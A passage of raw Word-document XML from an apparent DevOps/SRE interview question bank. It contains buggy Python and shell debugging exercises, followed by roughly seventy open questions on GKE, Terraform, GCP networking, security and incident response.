          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3_client = boto3.client(“s3”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>local_file_path = “/c/data/”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bcuket_name = “swapnilAkhi”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3_object_name = ““</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Debugging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Python/Debugging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Debug and complete the following Python script intended to upload a local file to an S3 bucket. Identify the syntax, naming, path, object-key, exception-handling, and AWS credential issues; then provide a production-safe version.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Import boto3</w:t>
        <w:br/>
        <w:t>From botocore.exceptions import clientError</w:t>
        <w:br/>
        <w:br/>
        <w:t>s3_client = boto3.client(“s3”)</w:t>
        <w:br/>
        <w:t>local_file_path = “/c/data/”</w:t>
        <w:br/>
        <w:t>bcuket_name = “swapnilAkhi”</w:t>
        <w:br/>
        <w:t>s3_object_name = ““</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q74. Debug and improve the following shell script intended to find regular files with permissions exactly 777. Explain the quoting, variable naming, permission-mode, error-handling, and filesystem-scope considerations.</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Search_path=“/”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find “$Search_path” -type f -perm 777 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Shell Debugging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Shell Debugging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Debug and improve the following shell script intended to find regular files with permissions exactly 777. Explain the quoting, variable naming, permission-mode, error-handling, and filesystem-scope considerations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>#!/bin/bash</w:t>
        <w:br/>
        <w:br/>
        <w:t>Search_path=“/”</w:t>
        <w:br/>
        <w:t>find “$Search_path” -type f -perm 777 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Part 2 — Topic Question Banks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The complete technical question bank organized by subject. Use this section to drill a specific technology or focus area in depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP / DevOps / SRE Question Bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Python automation: How would you build a Python tool that audits GCP projects for IAM risk, public buckets, unused firewall rules, missing labels, and cost anomalies?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Cloud security: How would you secure workload access to GCP services from GKE using Workload Identity, IAM, Secret Manager, and least privilege?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Vertex AI and MLOps: A team wants model serving on Kubernetes with FastAPI and GPU workloads. How would you design deployment, autoscaling, monitoring, and rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Go optional: Where would Go be useful in a platform engineering environment, and how would you decide between Go, Python, and Bash for automation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Terraform state: A Terraform apply failed halfway and now remote state does not match real GCP resources. How would you recover safely in an enterprise environment?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Cloud Run vs GKE: A company wants to standardize Cloud Run and GKE usage. How would you decide which workloads go to Cloud Run versus GKE?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud SQL/AlloyDB: How would you troubleshoot a private GKE workload that cannot connect to Cloud SQL or AlloyDB?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Pub/Sub reliability: A Pub/Sub consumer service is falling behind and message age is increasing. How would you debug backlog, scaling, ordering, retries, and dead-letter handling?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Cloud Storage security: How would you design Cloud Storage bucket security for logs, artifacts, and data exports, including IAM, retention, lifecycle, CMEK, and public access prevention?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. GCP networking: How would you design GCP Shared VPC, service projects, firewall rules, private service access, DNS, and service networking for a multi-team platform?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. GKE upgrades: A GKE cluster upgrade caused service disruption. How would you design a safer upgrade strategy for control plane, node pools, PDBs, and workloads?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Helm: How would you structure Helm charts and values for repeatable deployments across environments without creating configuration drift?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Network policies: A service should only receive traffic from one namespace and one ingress gateway. How would you implement and validate Kubernetes NetworkPolicies?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Service mesh: When would you introduce Istio or Anthos Service Mesh, and what are the operational risks around mTLS, traffic splitting, retries, and observability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Progressive delivery: How would you implement canary or blue-green releases using Cloud Deploy, Argo Rollouts, metrics, and automatic rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Release readiness: A production release passed CI but caused customer impact. How would you design production readiness checks and release gates to prevent this?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Incident leadership: You are the incident commander for a GKE outage. How would you manage technical debugging, stakeholder communication, timeline, mitigation, and postmortem?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. RCA: Walk me through how you would write a strong RCA for a repeated Kubernetes outage and turn it into preventive engineering work.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Error budgets: How would you explain error budgets to product managers and use them to make release decisions?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. ELK/OpenSearch: When would you use ELK or OpenSearch in addition to Cloud Logging, and how would you manage index cost and retention?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Admission controls: How would you enforce Kubernetes security standards using Gatekeeper, Kyverno, or admission controls without blocking developer velocity?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. Security Command Center: How would you operationalize Security Command Center findings into triage, ownership, SLAs, and remediation workflows?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Secrets migration: How would you migrate applications from mounted JSON service account keys to Workload Identity and Secret Manager?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Landing zone: How would you design a GCP landing zone for a product company, including org hierarchy, folders, projects, Shared VPC, IAM, org policies, logging, and billing?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. FinOps: A monthly GCP bill increased by 40 percent after a platform migration. How would you investigate and reduce cost without harming reliability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. DR/backup: How would you define RTO and RPO for a critical service on GCP, and how would you test backup, restore, and regional failover?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Multi-region design: You have a multi-region reliability requirement on GCP. How would you design traffic routing, data stores, failover, monitoring, and incident response?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Platform maturity: How would you evaluate whether a platform is mature enough for product-company scale across reliability, security, cost, developer experience, and automation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Gateway/API strategy: How would you choose between Ingress, Gateway API, service mesh, load balancers, and Apigee for different traffic management requirements?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. MLOps lifecycle: How would you design MLflow or Vertex AI model lifecycle management with approval, deployment, monitoring, drift detection, and rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. GPU workloads: How would you schedule GPU workloads on GKE with taints, tolerations, node pools, quotas, cost controls, and observability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. Cloud SQL backup restore: A Cloud SQL instance has accidental data deletion. How would you validate backups, point-in-time recovery, restore testing, application cutover, and communication?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. Regional failover drill: How would you plan and run a failover game day for a GKE service with Cloud SQL, Pub/Sub, load balancing, DNS, and observability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. GKE private cluster: A private GKE cluster cannot pull images or reach Google APIs. How would you debug private nodes, NAT, Private Google Access, DNS, routes, and firewall rules?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. GKE image pull failures: Pods are failing with ImagePullBackOff after a registry migration. How would you debug Artifact Registry permissions, Workload Identity, image tags, network, and pull secrets?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. GKE node pressure: Nodes show memory pressure and pods are being evicted. How would you investigate requests, limits, QoS classes, daemonsets, autoscaling, and app behavior?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. Kubernetes API server overload: The API server has high latency and controllers are falling behind. How would you use API Priority and Fairness, audit logs, request metrics, and client throttling to find and contain the source?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API server overload: The API server has high latency and controllers are falling behind. How would you use API Priority and Fairness, audit logs, request metrics, and client throttling to find and contain the source?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Kubernetes etcd performance: A self-managed cluster has slow writes and intermittent leader changes in etcd. How would you investigate disk latency, database size, fragmentation, quorum health, snapshots, and safe recovery?</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etcd performance: A self-managed cluster has slow writes and intermittent leader changes in etcd. How would you investigate disk latency, database size, fragmentation, quorum health, snapshots, and safe recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. Kubernetes scheduler internals: Walk through the scheduling cycle from an unscheduled Pod to node binding. How do filtering, scoring, preemption, topology spread constraints, and scheduler profiles affect the decision?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scheduler internals: Walk through the scheduling cycle from an unscheduled Pod to node binding. How do filtering, scoring, preemption, topology spread constraints, and scheduler profiles affect the decision?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. Kubernetes scheduling deadlock: Several critical Pods remain Pending even though aggregate cluster capacity appears sufficient. How would you analyze bin-packing, affinity rules, topology constraints, taints, PVC topology, and preemption?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scheduling deadlock: Several critical Pods remain Pending even though aggregate cluster capacity appears sufficient. How would you analyze bin-packing, affinity rules, topology constraints, taints, PVC topology, and preemption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Kubernetes graceful termination: A service drops requests during every rollout despite passing readiness checks. How would you coordinate endpoint removal, preStop, SIGTERM handling, terminationGracePeriodSeconds, load-balancer draining, and application shutdown?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graceful termination: A service drops requests during every rollout despite passing readiness checks. How would you coordinate endpoint removal, preStop, SIGTERM handling, terminationGracePeriodSeconds, load-balancer draining, and application shutdown?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. Kubernetes PDB failure scenario: A node upgrade is blocked by PodDisruptionBudgets, but relaxing them could violate availability targets. How would you diagnose the constraints and complete the maintenance safely?</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PDB failure scenario: A node upgrade is blocked by PodDisruptionBudgets, but relaxing them could violate availability targets. How would you diagnose the constraints and complete the maintenance safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. Kubernetes HPA instability: An HPA rapidly scales up and down while latency remains unstable. How would you inspect metric freshness, utilization math, missing requests, stabilization windows, scaling policies, and downstream bottlenecks?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HPA instability: An HPA rapidly scales up and down while latency remains unstable. How would you inspect metric freshness, utilization math, missing requests, stabilization windows, scaling policies, and downstream bottlenecks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. Kubernetes KEDA event scaling: How would you autoscale queue consumers with KEDA while preventing duplicate work, downstream overload, scale-to-zero delays, and retry storms?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KEDA event scaling: How would you autoscale queue consumers with KEDA while preventing duplicate work, downstream overload, scale-to-zero delays, and retry storms?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. Kubernetes CNI debugging: Pod-to-pod traffic fails only across nodes. How would you isolate CNI, routing, encapsulation, MTU, network policy, conntrack, and cloud firewall problems?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CNI debugging: Pod-to-pod traffic fails only across nodes. How would you isolate CNI, routing, encapsulation, MTU, network policy, conntrack, and cloud firewall problems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. Kubernetes DNS at scale: CoreDNS latency and SERVFAIL errors increase during traffic spikes. How would you investigate query amplification, ndots behavior, caching, upstream resolvers, autoscaling, and NodeLocal DNSCache?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DNS at scale: CoreDNS latency and SERVFAIL errors increase during traffic spikes. How would you investigate query amplification, ndots behavior, caching, upstream resolvers, autoscaling, and NodeLocal DNSCache?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. Kubernetes conntrack exhaustion: Services intermittently time out while Pods and nodes look healthy. How would you confirm conntrack exhaustion, identify the traffic pattern, mitigate impact, and prevent recurrence?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conntrack exhaustion: Services intermittently time out while Pods and nodes look healthy. How would you confirm conntrack exhaustion, identify the traffic pattern, mitigate impact, and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Kubernetes Gateway API migration: How would you migrate production traffic from Ingress to Gateway API while preserving TLS, routing behavior, policy ownership, observability, rollback, and zero downtime?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Gateway API migration: How would you migrate production traffic from Ingress to Gateway API while preserving TLS, routing behavior, policy ownership, observability, rollback, and zero downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Kubernetes zero-trust networking: Design default-deny ingress and egress controls for a multi-tenant cluster. How would you handle DNS, external APIs, service mesh mTLS, policy testing, and emergency access?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zero-trust networking: Design default-deny ingress and egress controls for a multi-tenant cluster. How would you handle DNS, external APIs, service mesh mTLS, policy testing, and emergency access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Kubernetes admission webhook outage: A validating webhook is timing out and blocking all deployments. How would you restore service safely and redesign failurePolicy, timeouts, replicas, certificates, and break-glass controls?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admission webhook outage: A validating webhook is timing out and blocking all deployments. How would you restore service safely and redesign failurePolicy, timeouts, replicas, certificates, and break-glass controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Kubernetes RBAC privilege escalation: How would you detect and prevent indirect privilege escalation through permissions such as creating Pods, binding roles, impersonating users, reading Secrets, or modifying admission webhooks?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RBAC privilege escalation: How would you detect and prevent indirect privilege escalation through permissions such as creating Pods, binding roles, impersonating users, reading Secrets, or modifying admission webhooks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. Kubernetes service account token security: How would you replace long-lived tokens with projected bound tokens and external workload identity while controlling audience, expiration, automounting, and token rotation?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service account token security: How would you replace long-lived tokens with projected bound tokens and external workload identity while controlling audience, expiration, automounting, and token rotation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Kubernetes StatefulSet recovery: A zonal failure leaves a quorum-based StatefulSet unavailable and volumes cannot attach in another zone. How would you recover while protecting consistency, ordering, identity, and RPO?</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StatefulSet recovery: A zonal failure leaves a quorum-based StatefulSet unavailable and volumes cannot attach in another zone. How would you recover while protecting consistency, ordering, identity, and RPO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. Kubernetes CSI failure: PVC provisioning and volume attachment are intermittently failing. How would you debug StorageClass parameters, CSI controller and node plugins, topology, quotas, finalizers, and cloud-provider events?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CSI failure: PVC provisioning and volume attachment are intermittently failing. How would you debug StorageClass parameters, CSI controller and node plugins, topology, quotas, finalizers, and cloud-provider events?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Kubernetes CRD evolution: You own an operator whose CustomResourceDefinition schema must change without breaking stored objects. How would you handle versioning, conversion webhooks, storage versions, defaulting, and rollback?</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CRD evolution: You own an operator whose CustomResourceDefinition schema must change without breaking stored objects. How would you handle versioning, conversion webhooks, storage versions, defaulting, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Kubernetes operator reconciliation: How would you design an idempotent controller reconciliation loop with finalizers, status conditions, retries, leader election, and protection against hot loops?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operator reconciliation: How would you design an idempotent controller reconciliation loop with finalizers, status conditions, retries, leader election, and protection against hot loops?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. Kubernetes GitOps disaster recovery: Git is available but a production cluster and its GitOps controller are lost. How would you rebuild cluster dependencies, secrets, CRDs, operators, and workloads in the correct order and prove recovery objectives?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GitOps disaster recovery: Git is available but a production cluster and its GitOps controller are lost. How would you rebuild cluster dependencies, secrets, CRDs, operators, and workloads in the correct order and prove recovery objectives?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Kubernetes multi-cluster failover: Design active-active or active-passive application delivery across clusters. How would you solve traffic steering, session state, data consistency, configuration drift, identity, and failback?</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multi-cluster failover: Design active-active or active-passive application delivery across clusters. How would you solve traffic steering, session state, data consistency, configuration drift, identity, and failback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. Kubernetes noisy neighbor: One tenant causes CPU throttling, memory pressure, and control-plane churn for others. How would you combine quotas, LimitRanges, priority classes, node isolation, fair queuing, and chargeback?</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noisy neighbor: One tenant causes CPU throttling, memory pressure, and control-plane churn for others. How would you combine quotas, LimitRanges, priority classes, node isolation, fair queuing, and chargeback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Kubernetes forensic debugging: A container was killed and recreated before engineers captured evidence. What logs, events, audit records, runtime data, core dumps, and ephemeral-container workflows would you establish for post-incident analysis?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forensic debugging: A container was killed and recreated before engineers captured evidence. What logs, events, audit records, runtime data, core dumps, and ephemeral-container workflows would you establish for post-incident analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. Compute Engine migration: How would you migrate legacy Compute Engine workloads to GKE or Cloud Run, and what factors would make you keep them on VMs?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. Pub/Sub exactly-once: A team expects exactly-once processing from Pub/Sub. How would you explain reality and design idempotency, ordering keys, retries, and DLQs?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. Private Service Connect: How would you use Private Service Connect for private service access, and how would you debug connectivity failures?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q64. Terraform secrets: How would you prevent secrets from leaking into Terraform state, plans, logs, and CI/CD output?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. Terraform import: A team created resources manually and wants them managed by Terraform. How would you plan imports and reduce risk?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. GitHub Actions security: How would you secure GitHub Actions for cloud deployments using OIDC, environments, approvals, least privilege, and secret handling?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. Release rollback: A canary deployment passes technical metrics but business metrics drop. How would you decide rollback versus continue?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. Toil reduction: How would you identify operational toil in a platform team and turn it into automation backlog?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Chaos testing: How would you introduce chaos engineering safely for GKE workloads and what failure modes would you test first?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. Logging cost: Cloud Logging cost is growing quickly. How would you reduce cost while preserving incident debugging value?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
